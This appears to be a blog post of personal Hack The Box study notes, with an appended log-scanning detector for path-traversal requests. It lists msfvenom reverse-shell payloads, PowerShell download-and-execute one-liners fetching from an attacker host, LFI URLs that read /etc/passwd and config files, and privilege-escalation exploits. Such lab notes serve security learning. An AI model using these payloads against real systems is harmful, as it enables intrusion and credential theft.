Wednesday, October 7, 2020

My technical notes related to penetration testing, HTB, ...

 

1. Ctrl+Shift+R - reverse search: search the command history in a Linux terminal

2. tmux - tmux is a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window.

 

3. nmap -sV -O -F --version-light 10.10.10.4

a. -sV: Probe open ports to determine service/version info

b. -O: Enable OS detection

c. -F: Fast mode - scan fewer ports than the default scan

d. --version-light: Limit to most likely probes (intensity 2)

e. 10.10.10.4: IP address of the Legacy box

 

4. Check for exploits on a machine where a shell is already open (required for privilege escalation):

https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

 

use post/multi/recon/local_exploit_suggester

then set session 1

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform the user has a shell opened on, as well as the exploits available in Meterpreter.

 

5. Search for a file on the compromised system (Meterpreter):

search -f user.txt

6. Create an exploit payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

-f: Output format

-o: Save the payload to a file

LHOST: Local host

LPORT: Local port

Now upload the file (with put/upload, or by downloading it from a Python web server).

Start a listener with multi/handler, then run the uploaded payload on the victim machine; it will create a session.

 

7. Check for an FTP service with nmap:

nmap -A -p21 -v 10.10.10.5

8. Elastix login portal: Elastix is unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call-center software with predictive dialling.

 

Available exploit: Elastix 2.0 - 'graph.php' Local File Inclusion

Payload: https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

9. SSH connect: ssh root@10.10.10.7

10. Get details of an exploit with searchsploit: searchsploit -x 18770.txt

11. If the exploit uses OpenSSL, a proxy can be set: set proxies http:127.0.0.1:8080

12. Default wordlist path for DirBuster: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

13. Vulnerable vTiger version 5.4.0 (RCE/CSRF/LFI): searchsploit vtiger

https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../etc/asterisk/manager.conf%00
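As an added defender-side example (my own addition, not part of the original notes or of the Elastix/vTiger exploit entries): a small Python scanner that flags the directory-traversal and %00 null-byte pattern from items 8 and 13 in web-server access logs. The log lines are constructed samples in Apache combined format; the double-encoded case in the last line goes beyond what the notes show.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format access-log lines (not from the original notes):
# the first two mirror the graph.php and sortfieldsjson.php requests above, the third is benign, the fourth is double-encoded traversal.
SAMPLE_LOG = """\
10.10.14.15 - - [07/Oct/2020:10:01:02 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.15 - - [07/Oct/2020:10:01:09 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
10.10.14.20 - - [07/Oct/2020:10:02:00 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.10.14.21 - - [07/Oct/2020:10:02:30 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 200 "-" "curl/7.68.0"
"""

# Request line inside the quoted field of a combined-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# ".." as a whole path segment, with either slash style as separator.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value):
    """Percent-decode until stable so double-encoded %252e%252e collapses to '..'."""
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def inspect_request(target):
    """Return [(param, reasons)] for query parameters carrying LFI indicators."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        reasons = []
        if TRAVERSAL_RE.search(value):
            reasons.append("traversal")
        if "\x00" in value:  # %00 is used to truncate a suffix the application appends
            reasons.append("null-byte")
        if reasons:
            findings.append((name, reasons))
    return findings

def scan_log(text):
    """Run inspect_request over each log line; one alert per suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        for param, reasons in inspect_request(target):
            alerts.append({"client": line.split()[0], "path": urlsplit(target).path,
                           "param": param, "reasons": reasons})
    return alerts
```

Running scan_log(SAMPLE_LOG) yields three alerts (the two vTiger requests and the double-encoded one) and nothing for the benign current_language=en_us request.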

14. nmap script to enumerate NFS exports via rpcbind: nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

15. Mount an exported site backup share if one is available: sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

16. Start the Apache service: systemctl start apache2

17. nmap result: 80/tcp open  http    HttpFileServer httpd 2.3

Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)

 

18. Set the payload for a 64-bit system: set payload windows/x64/meterpreter/reverse_tcp

19. Privilege escalation on Windows 2012 R2: exploit MS16-098 (41020.exe)

C:\Users\kostas\Desktop>41020.exe

41020.exe

Microsoft Windows [Version 6.3.9600]

(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>cd C:\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt

20. Command to copy data to the clipboard: cat abc.txt | xclip

21. Run a web server in Kali on port 8000: python -m SimpleHTTPServer

22. Run on the victim machine to download and execute the file: powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/exploit.html')"

23. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f exe > writeup.exe

24. powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.16:8000/writeup64.exe', 'writeup64.exe')"

25. With a Meterpreter session running, list the running processes: ps

26. Migrate into a running process: migrate <process_ID>

27. Unset a value in Metasploit: unset <parameter>

28. ncat -lvnp 4444: flags are -l listen, -v verbose, -n no DNS resolution, -p port

29. With only a user-level session on the target machine, the next step is to move to admin privileges -> migrate to a stable process on Windows, e.g. this ps entry:

3004  580   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

migrate 3004

30. An exploit for escalation to admin privileges on Windows 2003 R2: windows/local/ms14_070_tcpip_ioctl

...